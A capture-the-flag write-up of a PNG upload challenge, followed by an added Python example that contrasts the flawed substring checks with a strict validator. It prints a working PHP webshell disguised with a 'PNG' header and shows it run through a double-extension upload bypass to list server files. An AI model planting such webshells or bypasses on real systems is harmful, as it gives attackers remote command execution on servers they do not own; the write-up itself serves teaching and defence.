Trickster

If we check out /robots.txt, we find:

User-agent: *
Disallow: /instructions.txt
Disallow: /uploads/

On accessing /instructions.txt:

Let's create a web app for PNG Images processing.
It needs to:
Allow users to upload PNG images
    look for ".png" extension in the submitted files
    make sure the magic bytes match (not sure what this is exactly but wikipedia says that the first few bytes contain 'PNG' in hexadecimal: "50 4E 47" )
after validation, store the uploaded files so that the admin can retrieve them later and do the necessary processing.

We can upload a PNG file and access it at /uploads/img.png, but access to the parent folder /uploads/ is forbidden.

On trying to upload a non-PNG file, we get "Error: File name does not contain '.png'."

"contains". Hmmm... So the check is a substring match, not a test of the final extension: uploading a non-PNG file named file.png.txt worked!

Create a webshell whose first line is the text PNG, so that it satisfies the magic-bytes check:

PNG
<?php echo system($_GET['cmd']); ?>

Requesting /uploads/webshell.png.php?cmd=ls%20.. lists the files in the root directory, among which "GAZWIMLEGU2DQ.txt" seems interesting.

Accessing /GAZWIMLEGU2DQ.txt gives the flag.
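The upload check described in instructions.txt, modelled next to a stricter one, as an added example that is not part of the original writeup or the challenge's code. The server source is not shown on the page, so `weak_check` is an assumed reconstruction; `safe_store_name`, `compare` and the sample uploads are hypothetical names and constructed data.

```python
import os
import re
import secrets

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"  # the full 8-byte PNG file signature

# Constructed sample uploads (not taken from the challenge server).
REAL_PNG = PNG_SIGNATURE + b"\x00\x00\x00\rIHDR" + b"\x00" * 17
FAKE_PNG = b"PNG\n<?php /* placeholder script body */ ?>"


def weak_check(filename: str, data: bytes) -> bool:
    """Assumed model of the check in instructions.txt: substring tests only."""
    return ".png" in filename and b"PNG" in data[:8]


def safe_store_name(filename: str, data: bytes):
    """Return a server-chosen name to store the upload under, or None to reject."""
    base = os.path.basename(filename)
    # Exactly one extension, and it must be .png: rejects x.png.php and x.png.txt.
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.png", base):
        return None
    # Compare the whole signature at offset 0, not the letters "PNG" near the start.
    if not data.startswith(PNG_SIGNATURE):
        return None
    # Never reuse the client's name: the stored extension is fixed by the server,
    # so the file cannot later be requested under a script extension.
    return secrets.token_hex(16) + ".png"


def compare(filename: str, data: bytes):
    """Return (accepted by weak check, accepted by strict check)."""
    return weak_check(filename, data), safe_store_name(filename, data) is not None


if __name__ == "__main__":
    for name, data in [("img.png", REAL_PNG), ("file.png.txt", FAKE_PNG),
                       ("webshell.png.php", FAKE_PNG), ("img.png", FAKE_PNG)]:
        weak, strict = compare(name, data)
        print(f"{name:18} weak={weak!s:5} strict={strict}")
```

A file that begins with a valid signature and carries script text after it still passes the content check, so the server-fixed .png name and serving /uploads/ with script execution disabled are what keep it from running.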